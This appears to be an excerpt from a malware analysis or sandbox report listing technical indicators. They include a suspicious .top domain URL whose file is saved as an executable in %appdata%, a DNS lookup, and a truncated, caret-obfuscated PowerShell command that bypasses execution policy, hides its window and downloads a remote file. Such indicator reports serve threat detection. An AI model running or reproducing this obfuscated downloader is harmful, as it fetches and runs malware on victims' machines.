Technical Information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^erSH^E^Ll^.eX^E -e^xE^C^UTio^N^p^O^lic^Y ^by^P^a^Ss^ ^-^nO^pROfiL^E ^-^w^IN^DOW^sTYlE ^HiD^de^n^ ^(^NE^w^-^o^bj^E^ct^ ^syS^t^eM.nEt.^WE^BcL^ieNt).D^OwnLOaDfILe^('http:/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POW^erSH^E^Ll^.eX^E -e^xE^C^UTio^N^p^O^lic^Y ^by^P^a^Ss^ ^-^nO^pROfiL^E ^-^w^IN^DOW^sTYlE ^HiD^de^n^ ^(^NE^w^-^o^bj^E^ct^ ^syS^t^eM.nEt.^WE^BcL^ieNt).D^OwnLOaDfILe^('http:/...' (with hidden window)